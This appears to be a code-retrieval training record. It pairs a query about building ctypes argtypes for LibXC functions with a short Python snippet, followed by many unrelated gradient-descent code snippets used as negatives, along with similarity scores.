history_grad.append(grad)\r\n \r\n # Prepare results\r\n results = OptResults()\r\n results.theta, results.coeff = theta, coeff\r\n results.loss = loss_value\r\n results.history_loss = history_loss\r\n results.history_theta = history_theta\r\n results.history_grad = history_grad\r\n \r\n return results", "def fit(self, w):\n w_former = w\n w_next = w\n w_t = w\n w_t_100 = w\n w_diff = 10000\n i = 0\n #tim_beg = t.time()\n # use two part to calculate the a(w,w0):calculate the gradient using regular or SDG, batch = 10\n # calculate the gradient and update the w,w0\n while i < 10000 and np.abs(w_diff) > 0.00001:\n loss_func = self.lost\n grads = self.gradient(loss_func)\n # calculate the y_pred(eta)\n w_next = w_former - grads(w_former) / (10000)\n k =self.lost(w_next) - self.lost(w_former)\n m = np.dot(w_next-w_former, grads(w_former).T)\n if i != 0 and i % 100 == 0:\n w_t = w_t_100\n w_t_100 = w_next\n w_diff = 1 / len(w) * (np.sum(np.abs(w_t_100 - w_t)))\n i_loss = self.lost(w_next)\n print(\"Iteration < %d > with loss < %f >\" % (i, i_loss))\n #self.los_plt.append(i_loss)\n #tim = t.time() - tim_beg\n #self.tim.append(tim)\n i += 1\n w_former = w_next\n #plt.plot(self.tim, self.los_plt)\n #plt.xlabel(\"time\")\n #plt.ylabel('loss')\n #plt.show()\n if i >= 10000:\n print(\"~Optimization stops because finishing iteration~\")\n if np.abs(w_diff) <= 0.00001:\n print(\"~Optimization stops because of difference between weights are less than 0.00001~\")\n self.w_result = w_next", "def stochasticGradientDescent(x,y,theta,alpha):\n m,n = np.shape(x)\n convergence = 0.000000001\n lastCost = 0\n cost = -1 \n recurseCount = 0\n while abs(lastCost - cost) > convergence: # rcurse until converge\n lastCost = cost\n hypothesis = np.dot(x,theta) \n for i in range(m):\n # alpha = 4.0 / (1.0 + i) + 0.01 \n loss = hypothesis[i] - y[i]\n # gradient = np.dot(x[i],loss)\n gradient = x[i,:].transpose() * loss \n theta = theta - alpha * gradient\n cost = np.sum((hypothesis-y)**2)/(2*m)\n recurseCount += 1\n return recurseCount,theta", "def gradient_descent(features, values, theta, alpha, num_iterations):\n m = len(values)\n cost_history = []\n\n for i in range(num_iterations):\n predicted_values = np.dot(features, theta)\n delta = alpha / m * np.dot((predicted_values - values), features)\n theta = theta - delta\n cost = compute_cost(features, 
values, theta)\n cost_history.append(cost)\n return theta, pandas.Series(cost_history)", "def gradientDescentMulti(X, y, theta, alpha, num_iters):\n\n # Initialize some useful values\n J_history = []\n theta, J_history = gradientDescent(X, y, theta, alpha, num_iters)\n return theta, J_history", "def grad_reglog(w, X, y, **kwargs):\n p = np.exp(-y * (np.dot(X, w)))\n P = p / (1. + p)\n return -1 * np.dot(X.T, P * y) / X.shape[0]", "def compute_sgd_gradient(self, x_j, t_j):\n a = np.dot(x_j.T, self.w)\n return -1 * t_j * (1 / (1 + np.exp(a * t_j))) * x_j", "def grad(self, A, b, w):\n tmp = np.zeros(w.shape)\n kappa = 0.5\n wk = w\n if self.glm == 'Gaussian':\n Xwmy = np.dot(A, w) - b\n tmp = np.dot(Xwmy, A)\n elif self.glm == 'Poisson':\n xb = np.maximum(np.minimum(np.dot(A, w), 200), -200) #avoid overflow\n tmp = -np.dot(A.T, b - np.exp(xb))\n elif self.glm == 'Gamma':\n tmp = kappa * np.dot(A.T, np.reciprocal(np.dot(A, wk.T) - b))\n elif self.glm == 'Binomial':\n Xbeta = np.dot(A, w)\n pi = scipy.special.expit(Xbeta)\n #pi = np.reciprocal(1.0 + np.exp(-Xbeta))\n tmp = -np.dot(A.T, (b.flatten() - pi.flatten()))\n if self.mean:\n tmp *= 1.0 / float(A.shape[0])\n return tmp", "def least_squares_GD(y, tx, initial_w, max_iters, gamma):\n # Define parameters to store w and loss\n w = initial_w\n for n_iter in range(max_iters):\n # compute gradient\n grad = compute_gradient(y, tx, w)\n # gradient w by descent update\n if n_iter % (max_iters//10) == 0:\n print(compute_cost(y, tx, w))\n w -= gamma * grad\n\n return w, compute_cost(y, tx, w)", "def gradient(self, X, V, W, Y):\n one, d_plus_one = X.shape\n K, H_plus_one = W.shape\n d = d_plus_one - 1\n H = H_plus_one - 1\n\n Z, Yhat = self.forward(X, V, W)\n assert one == 1\n x = X\n y = Y\n z = Z.ravel()\n yhat = Yhat.ravel()\n\n # Update W\n # grad__L__yhat = (yhat - y) / np.clip(yhat * (1 - yhat), EPSILON, inf)\n # grad__L__z[:] = 0.0\n # for k in range(K):\n # grad__yhat_k__W_k = z * yhat[k] * (1 - yhat[k])\n # # Last element corresponds to constant offset 1 appended to z\n # # vector; it does not change / has no derivative.\n # grad__yhat_k__z = W[k, :-1] * yhat[k] * (1 - yhat[k])\n # grad__L__z += grad__L__yhat[k] * grad__yhat_k__z\n # W[k, :] -= self.learning_rate * grad__L__yhat[k] * grad__yhat_k__W_k\n grad__L__z = (W.T * (yhat - y)).sum(axis=1)\n zz = z.reshape((1, H + 1)).repeat(K, 0)\n grad__L__W = diag(yhat - y) @ zz\n\n # Update V\n # for h in range(H):\n # grad__z_h__V_h = x * (1 - z[h] ** 2)\n # grad__L__V_h = grad__L__z[h] * grad__z_h__V_h\n # V[h, :] -= self.learning_rate * grad__L__V_h\n xx = x.reshape((1, d + 1)).repeat(H + 1, 0)\n grad__L__V = diag((1 - z ** 2) * grad__L__z) @ xx\n\n return grad__L__V, grad__L__W", "def gradient_descent(\n self,\n coeffs, \n x_values, y_values):\n old_loss = self.old_loss\n mse = self.loss\n\n for i in range(self.steps):\n new_loss = self.loss_mse(coeffs, x_values, y_values)\n mse = np.append(mse, new_loss)\n if abs(new_loss - old_loss) <= self.early_stop:\n print(f\"Early cut off, difference of losses between steps is less that {self.early_stop}.\")\n break\n old_loss = new_loss\n\n coeffs = coeffs - (self.learning_rate)*self.gradient_calculation(coeffs, x_values, y_values)\n\n mse = np.append(mse, self.loss_mse(coeffs, x_values, y_values))\n self.coefficients = coeffs\n self.loss = mse", "def gradient_descent(X, y, theta, learning_rate, num_iters, lambda_reg):\n thetas = [theta]\n cost = np.zeros(num_iters)\n\n J = mean_cross_entropy_costs(X, y, lambda_reg)\n cost[0] = J(thetas[0])\n for i in 
range(1, num_iters):\n thetas.append(compute_new_theta(X, y, thetas[i - 1], learning_rate, lambda_reg))\n cost[i] = J(thetas[i])\n return cost, thetas", "def backward(self, i):\n \n #Compute gradient for w1, w2, w3\n w1_grad = np.zeros((2, 3))\n w2_grad = np.zeros((3, 3))\n w3_grad = np.zeros((3, 1))\n \n \n w3_backward_pass = np.zeros((1, 1))\n w2_backward_pass = np.zeros((1, 3))\n \n #print(\"self.error shape\",self.error.shape)\n #Compute w3 gradient\n for i, w in enumerate(w3_grad): # 3 x 1 \n w3_forward_pass = self.a2[0][i]\n w3_backward_pass = self.error * der_sigmoid(self.y)\n w3_grad[i] = w3_forward_pass * w3_backward_pass\n \n #Compute w2 gradient\n for i, w_row in enumerate(w2_grad): # 3 x 3 \n for j, w in enumerate(w2_grad[i]):# 1 x 3 \n w2_forward_pass = self.a1[0][i]\n w2_backward_pass[0][i] = der_sigmoid(self.a2[0][i]) * self.w3[i][0] * w3_backward_pass\n w2_grad[i][j] = w2_forward_pass * w2_backward_pass[0][i]\n \n \n #Compute w1 gradient \n for i, w_rol in enumerate(w1_grad): # 2 x 3\n for j, w in enumerate(w1_grad[i]): # 1 x 3\n w1_forward_pass = self.input[0][i]\n w1_backward_pass = der_sigmoid(self.a1[0][i]) * self.w2[i][j] * w2_backward_pass[0][i]\n w1_grad[i][j] = w1_forward_pass * w1_backward_pass\n \n \n #Update \n for i, w in enumerate(w3_grad): \n self.w3[i] -= self.learning_rate * w3_grad[i]\n \n for i, w_row in enumerate(w2_grad): # 3 x 3 \n for j, w in enumerate(w2_grad[i]):# 1 x 3 \n self.w2[i][j] -= self.learning_rate * w2_grad[i][j]\n \n for i, w_rol in enumerate(w1_grad): # 2 x 3\n for j, w in enumerate(w1_grad[i]): # 1 x 3\n self.w1[i][j] -= self.learning_rate * w1_grad[i][j]\n \n #print(\"w3 grad : \", w3_grad)\n #print(\"w3.shape :\", self.w3.shape)", "def batchGradientDescent(x,y,theta,alpha):\n m,n = np.shape(x)\n xTran = x.transpose()\n convergence = 0.000000001\n lastCost = 0\n cost = -1 \n recurseCount = 0\n while abs(lastCost - cost) > convergence: # rcurse until converge\n lastCost = cost\n hypothesis = np.dot(x,theta)\n loss = hypothesis - y\n cost = np.sum(loss**2)/(2*m)\n gradient = np.dot(xTran,loss)/m\n theta = theta - alpha*gradient\n recurseCount += 1\n return recurseCount,theta", "def gradient_descent(X, Y, max_iter=1000, eta=0.1, mu=0.01):\n Y_onehot = onehot_encoder.fit_transform(Y.reshape(-1,1))\n W = np.zeros((X.shape[1], Y_onehot.shape[1]))\n step = 0\n step_lst = []\n loss_lst = []\n W_lst = []\n\n while step < max_iter:\n step += 1\n W -= eta * gradient(X, Y_onehot, W, mu)\n step_lst.append(step)\n W_lst.append(W)\n loss_lst.append(loss(X, Y_onehot, W))\n\n df = pd.DataFrame({\n 'step': step_lst,\n 'loss': loss_lst\n })\n return df, W", "def stochastic_gradient_descent(y, tx, initial_w, max_iters, gamma, compute_loss, compute_grad,\n batch_size=1, verbose=False):\n \n w = initial_w.copy()\n loss = 0\n\n for n_iter, (minibatch_y, minibatch_tx) in \\\n enumerate(batch_iter(y, tx, batch_size, num_batches=max_iters)):\n \n grad = compute_loss(minibatch_y, minibatch_tx, w)\n loss = compute_grad(minibatch_y, minibatch_tx, w)\n\n w -= gamma * grad\n\n if verbose:\n print(f\"Stochastic Gradient Descent ({n_iter}/{max_iters - 1}): loss={loss}, w={w}\")\n\n return w, loss", "def gradient_function(theta, X, y):\n\n grad = None\n #######################################################################\n # TODO: #\n # Compute the gradient for a particular choice of theta. #\n # Compute the partial derivatives and set grad to the partial #\n # derivatives of the cost w.r.t. 
each parameter in theta #\n # #\n #######################################################################\n \n theta = theta[:, np.newaxis]\n \n thetatrans = theta.T\n Xtrans = X.T\n \n MulThetaX = np.dot(thetatrans, Xtrans)\n \n h = sigmoid(MulThetaX)\n \n grad = (y - h) * Xtrans\n\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n return grad", "def gradientFunctionReg(theta, X, y, Lambda):\n m = len(y) # number of training examples\n grad = np.zeros(theta.shape[0])\n theta = np.transpose(theta)\n sum_1 = 0\n X = X.values\n y = y.values\n #calcuate the theta_0 \n# ====================== YOUR CODE HERE ======================\n# Instructions: Compute the gradient of a particular choice of theta.\n# Compute the partial derivatives and set grad to the partial\n# derivatives of the cost w.r.t. each parameter in theta\n for i in range(theta.shape[0]):\n if i == 0:\n for j in range(m):\n sum_1 += (sigmoid(np.dot(X[j],theta)) - y[j]) * X[j,i]\n else:\n for j in range(m):\n sum_1 += (sigmoid(np.dot(X[j],theta)) - y[j]) * X[j,i] + Lambda*theta[i]\n grad[i] = sum_1/m\n sum_1 = 0\n\n# =============================================================\n\n return grad", "def amended_gradient(self, dw, trn_X, trn_y, epsilon: float = 0.01, amend: float = 0.1):\n norm = torch.cat([w.view(-1) for w in dw]).norm()\n eps = epsilon / norm\n\n dw_pos = self.finite_difference(dw, trn_X, trn_y, eps, wrt='weights')\n dw_neg = self.finite_difference(dw, trn_X, trn_y, -eps, wrt='weights')\n dalpha_pos = self.finite_difference([(wp - wn) / 2 for wp, wn in zip(dw_pos, dw_neg)], trn_X, trn_y, 1, wrt='alpha')\n dalpha_neg = self.finite_difference([(wp - wn) / 2 for wp, wn in zip(dw_pos, dw_neg)], trn_X, trn_y, -1, wrt='alpha')\n hessian = [-amend * (p - n) / (2. 
* eps) for p, n in zip(dalpha_pos, dalpha_neg)]\n return hessian", "def evaluate(self, w, X, y):\n # help avoid mistakes (as described in the assignment) by\n # potentially reshaping our arguments\n w = ensure_1d(w)\n y = ensure_1d(y)\n\n # Prediction is linear combination\n y_hat = X @ w\n # Residual is difference between ground truth and prediction\n # (\"what's left\" after your predicition)\n residuals = y - y_hat\n # Squared residuals gives us the objective function value\n f = 0.5 * np.sum(residuals ** 2)\n\n # Analytical gradient, written in mathematical form first\n # and then translated into Python.\n # The parentheses on the first term are just a small optimization:\n # this way, we do two matrix-vector multipliciations,\n # instead of a (more expensive) matrix-matrix mult and a matrix-vector\n g = X.T @ (X @ w) - X.T @ y\n return f, g", "def logistic_regression_gradient_descent(y, tx, initial_w, max_iters, gamma):\n\tw = initial_w\n\n\tfor iter in range(max_iters):\n\t\tw = learning_by_gradient_descent(y, tx, w, gamma)\n\n\treturn w", "def least_squares_GD(y, tx, initial_w, max_iters, gamma):\n w_start = initial_w\n w = w_start\n\n for n_iter in range(max_iters):\n gradient = compute_gradient(y, tx, w)\n loss = compute_loss(y,tx,w)\n w = w - gamma * gradient\n\n return w, loss", "def test_gradient_step(var_f, len_f, var_y, N):\n\n x, y = build_data(N)\n\n gp_model = initialise_gp_model(var_f, len_f, var_y, x, y)\n markovgp_model = initialise_markovgp_model(var_f, len_f, var_y, x, y)\n\n gv = objax.GradValues(gp_model.energy, gp_model.vars())\n gv_markov = objax.GradValues(markovgp_model.energy, markovgp_model.vars())\n\n lr_adam = 0.1\n lr_newton = 1.\n opt = objax.optimizer.Adam(gp_model.vars())\n opt_markov = objax.optimizer.Adam(markovgp_model.vars())\n\n gp_model.update_posterior()\n gp_grads, gp_value = gv()\n gp_loss_ = gp_value[0]\n opt(lr_adam, gp_grads)\n gp_hypers = np.array([gp_model.kernel.lengthscale, gp_model.kernel.variance, gp_model.likelihood.variance])\n print(gp_hypers)\n print(gp_grads)\n\n markovgp_model.update_posterior()\n markovgp_grads, markovgp_value = gv_markov()\n markovgp_loss_ = markovgp_value[0]\n opt_markov(lr_adam, markovgp_grads)\n markovgp_hypers = np.array([markovgp_model.kernel.lengthscale, markovgp_model.kernel.variance,\n markovgp_model.likelihood.variance])\n print(markovgp_hypers)\n print(markovgp_grads)\n\n np.testing.assert_allclose(gp_grads[0], markovgp_grads[0], rtol=1e-4)\n np.testing.assert_allclose(gp_grads[1], markovgp_grads[1], rtol=1e-4)\n np.testing.assert_allclose(gp_grads[2], markovgp_grads[2], rtol=1e-4)", "def compute_gradient (w, x, y):\n (n,d) = x.shape\n g = np.zeros(d)\n for i in range(0,d):\n g[i] = (w*x-y)*np.transpose(x[i])\n g += 0.5*w\n return g", "def approx_grad(theta, X, y):\n grad_a = np.array([(cost(theta + e, X, y) - cost(theta - e, X, y)) / (2 * 1e-5)\n for e in np.identity(len(theta)) * 1e-5])\n return grad_a", "def gradientDescent (trainingFaces, trainingLabels, cost, gradient, w, learning_rate, tolerance, freq, alpha = 0.):\n\n # Initialize starting values\n lastJ = np.inf\n currentJ = cost(w, trainingFaces, trainingLabels, alpha) \n delta = lastJ - currentJ\n num_iter = 1\n \n while (delta > tolerance):\n \n # Problem 2 runs for ~80 iterations\n # Problem 3 runs for ~19000 iterations\n # This allows us to show every iteration for Problem 2,\n # while only showing every 100 iterations for Problem 3\n if (not (num_iter % freq)):\n print(\"%4d: J = %10f\\t||w|| = %5f\\tDelta = %5f\" % ((num_iter, currentJ, 
np.linalg.norm(w), delta)))\n \n # Update values\n lastJ = currentJ\n w = w - ( learning_rate * gradient(w, trainingFaces, trainingLabels) )\n currentJ = cost(w, trainingFaces, trainingLabels, alpha)\n delta = abs(lastJ - currentJ)\n num_iter += 1\n \n return w", "def gradient_descent(features, values, theta, alpha, num_iterations):\n \n # number of points\n npoints = len(values)\n \n # intialize cost history\n cost_history = []\n \n # num_interations iterations\n for iiter in range(num_iterations):\n \n # compute and store cost\n cost = compute_cost(features, values, theta)\n cost_history.append(cost)\n \n # update values of theta\n values_predicted = np.dot(features, theta)\n theta = theta + (alpha/npoints)*(np.dot(values - values_predicted,features))\n \n return theta, pandas.Series(cost_history)", "def least_squares_GD(y, tx, initial_w, max_iters, gamma, loss_function=mse, gradient=mse_grad):\n w = initial_w\n for iter in range(max_iters):\n # compute gradient\n grad = gradient(y, tx, w)\n # update w\n w = w - gamma * grad\n loss = loss_function(y, tx, w)\n return w, loss", "def Perceptron(i, x_batch, y_batch, w):\n \n for j in tqdm(xrange(x_batch.shape[0])):\n # y * w^{T} * x\n if y_batch[j] * w.multiply(x_batch[j]).sum() < 0:\n # w^{t+1} = w^{t} + y * x\n w += y_batch[j] * x_batch[j]\n return w, None", "def fgrad_y(self,y,psi):\r\n raise NotImplementedError", "def grad(self, A, b, w):\n tmp = np.zeros(w.shape)\n kappa = 0.5\n\n wk = w\n if self.glm == 'Gaussian':\n Xwmy = np.dot(A, w) - b\n tmp = np.dot(Xwmy, A)\n elif self.glm == 'Poisson':\n xb = np.maximum(np.minimum(np.dot(A, w), 200), -200) #avoid overflow\n tmp = -np.dot(A.T, b - np.exp(xb))\n elif self.glm == 'Gamma':\n tmp = kappa * np.dot(A.T, np.reciprocal(np.dot(A, wk.T) - b))\n elif self.glm == 'Binomial':\n Xbeta = np.dot(A, w)\n pi = np.reciprocal(1.0 + np.exp(-Xbeta))\n tmp = -np.dot(A.T, (b.flatten() - pi.flatten()))\n if self.mean:\n tmp *= 1.0 / float(A.shape[0])\n return tmp", "def gradient_descent(X, y, theta, alpha, total_iterations, hypothesis):\n len_theta = len(theta)\n m = len(y)\n one_over_m = (1.0 / float(m))\n\n for _ in range(0, total_iterations):\n temp_theta = numpy.zeros(len_theta)\n\n X_by_theta_minus_y = numpy.subtract(hypothesis(numpy.matrix(theta), X), y)\n\n for j in range(0, len_theta):\n jth_column_of_X = X[:,j]\n derivative_j = one_over_m * numpy.multiply(X_by_theta_minus_y, jth_column_of_X).sum()\n temp_theta[j] = theta[j] - alpha*derivative_j\n\n theta = temp_theta\n\n return numpy.matrix(theta)", "def _learn_using_GD(self, y, tx, w, fn, gamma, lambda_, regularization):\n loss, grad = fn(y, tx, w, lambda_)\n loss, grad = self.apply_regularization(w, loss, grad, regularization, lambda_, tx.shape[0])\n w = w - gamma * grad\n return loss, w", "def least_squares_gradient(y, tx, w): \n e = y - tx.dot(w)\n grad = -tx.T.dot(e) / len(e)\n return grad, e", "def GradientDescent(X, Y, alpha, iterations):\n\n\tn = X.shape[0]\n\tbeta = np.zeros((X.shape[1],1))\n\n\tfor i in range(1,iterations):\n\t\tbeta = beta - alpha*np.dot(np.transpose(X), np.dot(X, beta) - Y)/float(n)\n\t\t# risk = ((np.dot(X, beta) - Y)**2)/(2*float(n))\n\n\treturn beta", "def compute_gradient(X, t, w): # TODO: try to change to square loss since it's hessian is easier to obtain\n # TODO : print to console the max gradient in every run\n A = np.dot(X, w)\n m = t.shape[0]\n C = -1 * t * (1 / (1 + np.exp(A * t)))\n return (1 / m) * np.dot(X.T, C)", "def gradientFunctionReg(theta, X, y, Lambda): \n y = np.squeeze(y)\n m = y.shape # 
number of training samples\n grad = X.T.dot(sigmoid(theta.dot(X.T))-1*y)\n grad[1:] = grad[1:] + Lambda*theta[1:]\n grad /= m\n\n return grad", "def compute_gradient(self): # TODO: try to change to square loss since it's hessian is easier to obtain\n A = np.dot(self.X, self.w)\n m = self.t.shape[0]\n C = -1 * self.t * (1 / (1 + np.exp(A * self.t)))\n return (1 / m) * np.dot(self.X.T, C)", "def optimize(w, b, X, Y, num_iterations,learning_rate,print_cost = False):\n costs = []\n for i in range(num_iterations):\n\n # Cost and gradient calculation (≈ 1-4 lines of code)\n ### START CODE HERE ###\n grads,cost = propagate(w,b,X,Y)\n ### END CODE HERE ###\n\n # Retrieve derivatives from grads\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n\n # update rule (≈ 2 lines of code)\n ### START CODE HERE ###\n w = w - learning_rate*dw\n b = b - learning_rate*db\n ### END CODE HERE ###\n\n # Record the costs\n if i % 100 == 0:\n costs.append(cost)\n\n # Print the cost every 100 training examples\n if print_cost and i%100==0:\n print(\"Cost after iteration %i: %f\"%(i,cost))\n\n params = {\n \"w\":w,\n \"b\":b\n }\n grads = {\n \"dw\":dw,\n \"db\":db\n }\n return params,grads,costs", "def compute_gradient(Y, mi, latent_Sigmas, B1, B2, ss, mu, g1, g2, sigma2, index):\n\n # these are the 's' parameters when nu=e_q, beta=0\n si = -mi[-1]*ss[index][-1]\n Sigma = latent_Sigmas[index]\n yi = Y[index]\n\n B1_plus_B2 = B1 + B2\n\n b0 = -mi.reshape(-1, 1) + 1/(2*sigma2)*np.matmul(B1_plus_B2.T, (yi-mu).T)\n\n b1 = (SQRT_PI_OVER_2-1-si**2)*np.exp(-si**2/2)*g1*np.trace(\n np.matmul(\n np.matmul(\n B1.T, B1\n ),\n Sigma\n )\n )\n\n b2 = si*np.exp(-si**2/2)*g2*np.trace(\n np.matmul(\n np.matmul(\n B2.T,\n B2\n ),\n Sigma\n )\n )\n\n B1TB1 = np.matmul(B1.T, B1)\n B2TB2 = np.matmul(B2.T, B2)\n\n b3 = np.exp(-si**2/2)*np.matmul(\n mi.T,\n np.matmul(\n B2TB2 - B1TB1,\n mi\n )\n )\n\n b4 = ROOT2PI*np.matmul(\n mi,\n erfc(si/ROOT2)*B1TB1 + (erf(si/ROOT2)+1)*B2TB2\n ).reshape(-1, 1)\n\n # qth_terms = [-var[-1]*eq*(item1 + item2 + item3) for var, item1, item2, item3 in zip(latent_variances, b1, b2, b3)]\n\n # return sum([outer_term + (TWOPI)**(1/2-q)/(2*sigma2)*inner_term for outer_term, inner_term in zip(b0, inner_terms)])\n\n result = b0 + b4\n\n # update the qth element with the corresponding derivative elements\n result[-1] += (TWOPI)**(1/2-q)/(2*sigma2)*(b1 + b2 + b3)\n\n return result.flatten()", "def add_grad_updates(self):\n \n gradients = T.grad(self.cost, self.theta)\n \n for target_param, grad in zip(self.theta, gradients):\n \n if target_param.name ==\"W\" and self.num_hidden ==0\\\n and self.zero_diag:\n \n grad = grad - T.diag(T.diag(grad)) # no x i - xi connections\n # for all i = 1, ..., D\n ##############################################################\n if target_param.name ==\"b\" and self.learn_biases == False:\n print(\"Will not learn bias terms\")\n pass\n \n elif target_param.name ==\"bhid\" and self.learn_biases == False:\n print(\"Will not learn bias terms\")\n pass\n \n else:\n \n if self.use_momentum:\n \n # alternative definition (mostly seen):\n #g_tilda = self.momentum*self.grad_vec[target_param.name] - \\\n #T.cast(self.learning_rate, dtype = theano.config.floatX)*grad\n #self.updates[target_param] = target_param + g_tilda\n \n g_tilda = self.momentum*self.grad_vec[target_param.name] - \\\n (1-self.momentum)*grad\n \n self.updates[target_param] = target_param +\\\n T.cast(self.learning_rate, dtype = theano.config.floatX)*g_tilda\n \n # store g_tilda for next iteration:\n 
self.updates[self.grad_vec[target_param.name]] = g_tilda\n \n else:\n \n self.updates[target_param] = target_param -\\\n T.cast(self.learning_rate, dtype = theano.config.floatX)*grad\n \n if (\"PCD\" in self.algorithm) and self.num_hidden > 0:\n \n self.updates[self.persistent_gibbs] = self.hid_samples", "def grad(self, w):\n l1_grad = self.r * np.sign(w)\n l2_grad = np.asarray(1 - self.r) * w \n\n gradient_penalty = self.alpha * (l1_grad + l2_grad)\n\n # Insert 0 for bias term.\n return np.insert(gradient_penalty, 0, 0, axis=0)", "def gradient_ascent(f, df, theta_init, step_size, max_iter):\n\n fs = []\n xs = []\n thetas = theta_init\n for i in range(max_iter): #for each data example\n fs.append(f(thetas))\n\n temp = step_size*df(thetas)\n thetas = step_size*df(thetas) #modify that feature by using the derivative of log likelihood\n xs.append(thetas.flatten())\n if i % 10 == 0:\n print(i, thetas)\n\n return thetas, fs, xs", "def grad(self, K, y, ak):\n Ka = K.dot(ak) # precompute\n z = y * Ka # decision value for each observation\n grad = (-1*K[z < 1].T.dot(y[z < 1])) / y.size # gradient of hinge\n l2 = (2 * self.lambda_ * Ka) # gradient of l2\n # Don't regularize offset dimension\n grad[:self.offset(ak)] = grad[:self.offset(ak)] + l2[:self.offset(ak)]\n # Gradient normalized by the num obs\n return grad", "def calc_grad(X, Y, theta):\n m, n = X.shape\n\n margins = Y * X.dot(theta)\n probs = 1. / (1 + np.exp(margins))\n grad = -(1./m) * (X.T.dot(probs * Y))\n\n return grad", "def gradient_descent(g_dd, y_train, loss, g_td=None):\n\n output_dimension = y_train.shape[-1]\n\n g_dd = empirical.flatten_features(g_dd)\n\n def fl(fx):\n \"\"\"Flatten outputs.\"\"\"\n return np.reshape(fx, (-1,))\n\n def ufl(fx):\n \"\"\"Unflatten outputs.\"\"\"\n return np.reshape(fx, (-1, output_dimension))\n\n # These functions are used inside the integrator only if the kernel is\n # diagonal over the logits.\n ifl = lambda x: x\n iufl = lambda x: x\n\n # Check to see whether the kernel has a logit dimension.\n if y_train.size > g_dd.shape[-1]:\n out_dim, ragged = divmod(y_train.size, g_dd.shape[-1])\n if ragged or out_dim != y_train.shape[-1]:\n raise ValueError()\n ifl = fl\n iufl = ufl\n\n y_train = np.reshape(y_train, (-1))\n grad_loss = grad(functools.partial(loss, y_hat=y_train))\n\n if g_td is None:\n dfx_dt = lambda unused_t, fx: -ifl(np.dot(g_dd, iufl(grad_loss(fx))))\n\n def predict(dt, fx=0.):\n r = ode(dfx_dt).set_integrator('dopri5')\n r.set_initial_value(fl(fx), 0)\n r.integrate(dt)\n\n return ufl(r.y)\n else:\n g_td = empirical.flatten_features(g_td)\n\n def dfx_dt(unused_t, fx, train_size):\n fx_train = fx[:train_size]\n dfx_train = -ifl(np.dot(g_dd, iufl(grad_loss(fx_train))))\n dfx_test = -ifl(np.dot(g_td, iufl(grad_loss(fx_train))))\n return np.concatenate((dfx_train, dfx_test), axis=0)\n\n def predict(dt, fx_train=0., fx_test=0.):\n r = ode(dfx_dt).set_integrator('dopri5')\n\n fx = fl(np.concatenate((fx_train, fx_test), axis=0))\n train_size, output_dim = fx_train.shape\n r.set_initial_value(fx, 0).set_f_params(train_size * output_dim)\n r.integrate(dt)\n fx = ufl(r.y)\n\n return fx[:train_size], fx[train_size:]\n\n return predict" ]
[ "0.7216477", "0.71876305", "0.71149236", "0.7052852", "0.7013499", "0.69575596", "0.69293684", "0.68894744", "0.6888488", "0.688774", "0.6869979", "0.68588704", "0.6835098", "0.6807218", "0.6702064", "0.66813123", "0.66674036", "0.65884393", "0.6562325", "0.6562148", "0.6537826", "0.6526787", "0.6515124", "0.65035146", "0.6500977", "0.6492697", "0.6487275", "0.6484871", "0.64803183", "0.64718294", "0.6469536", "0.64684653", "0.64640296", "0.6455923", "0.6443302", "0.6439009", "0.6437436", "0.642056", "0.6419518", "0.6414511", "0.641008", "0.64076257", "0.6379973", "0.63556844", "0.6352346", "0.6352183", "0.63509417", "0.6339519", "0.6336618", "0.63298196", "0.63240683", "0.6323299", "0.6321625", "0.63017195", "0.6300362", "0.6300137", "0.62991244", "0.6296372", "0.6271314", "0.6267025", "0.626573", "0.625344", "0.6250401", "0.62466156", "0.6243037", "0.6241598", "0.62315917", "0.6229713", "0.6219098", "0.62183934", "0.6217658", "0.6207271", "0.6195172", "0.619186", "0.61865455", "0.6184996", "0.6184693", "0.6179402", "0.61756724", "0.6173997", "0.61705595", "0.6167974", "0.61671406", "0.6163665", "0.6151914", "0.614696", "0.61430895", "0.6142707", "0.61397976", "0.61384594", "0.6136737", "0.61339134", "0.6125221", "0.6124089", "0.61230785", "0.6121949", "0.6106431", "0.61054814", "0.6103296", "0.60978055", "0.6097466" ]
0.0
-1
Small function to build the correct argtypes for the LibXC computers
def _build_comute_argtype(num_nd, num_nd_write):
    ret = [_xc_func_p, ctypes.c_size_t]
    ret += [_ndptr] * num_nd
    ret += [_ndptr_w] * num_nd_write
    return tuple(ret)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cmd_type(args):", "def _cast_types(args):\n\targs.x_val = None if args.x_val == 'None' else int(args.x_val)\n\targs.test_size = float(args.test_size)\n\targs.alpha = float(args.alpha)\n\targs.fit_prior = (args.fit_prior in ['True', \"True\", 'true', \"true\"])\n\n\t# class_prior - array like type (problem to convert)\n\tif args.class_prior == \"None\" or args.class_prior == 'None':\n\t\targs.class_prior = None\n\n\t# --------- #\n\treturn args", "def set_arg_types( self ):\n if self.mode == 'grad':\n self.function = terms.dw_grad\n use_method_with_name( self, self.get_fargs_grad, 'get_fargs' )\n elif self.mode == 'div':\n self.function = terms.dw_div\n use_method_with_name( self, self.get_fargs_div, 'get_fargs' )\n else:\n self.function = self.d_eval\n use_method_with_name( self, self.get_fargs_eval, 'get_fargs' )\n self.use_caches = {'state_in_volume_qp' : [['parameter_s']],\n 'div_vector' : [['parameter_v']]}", "def determine_arg_locations(self, arg_types): # pragma: no cover\n raise NotImplementedError(\"Implement this\")", "def processCmdLineArgs(expectedTypes, usage):\n\targs = []\n\tnumComLineArgs = len(sys.argv)\n\tnumExpected = len(expectedTypes)\n\tif (numComLineArgs - 1 == len(expectedTypes)):\n\t\ttry:\n\t\t\tfor i in range(0, numExpected):\n\t\t\t\tif (expectedTypes[i] == typeInt):\n\t\t\t\t\targs.append(int(sys.argv[i+1]))\n\t\t\t\telif (expectedTypes[i] == typeFloat):\n\t\t\t\t\targs.append(float(sys.argv[i+1]))\n\t\t\t\telif (expectedTypes[i] == typeString):\n\t\t\t\t\targs.append(sys.argv[i+1])\n\t\texcept ValueError:\n\t\t\tprint (\"expected number of command line arguments found but there is type mis match\")\n\t\t\tsys.exit(1)\n\telse:\n\t\tprint (\"expected number of command line arguments not found\")\n\t\tprint (usage)\n\t\tsys.exit(1)\n\treturn args", "def get_check_types():", "def generate_python_argument_types(argtypes: Union[List, str], outdir: str, prefix: str = 'sc', types=None):\n if type(argtypes) is str:\n argtypes = json.load(open(argtypes, 'r'))\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n type_to_args = collections.defaultdict(set)\n for arg in argtypes:\n argtype = argtypes[arg]\n if types is not None:\n if argtype not in types:\n continue\n type_to_args[argtype].add(arg)\n for argtype in type_to_args:\n real_args = 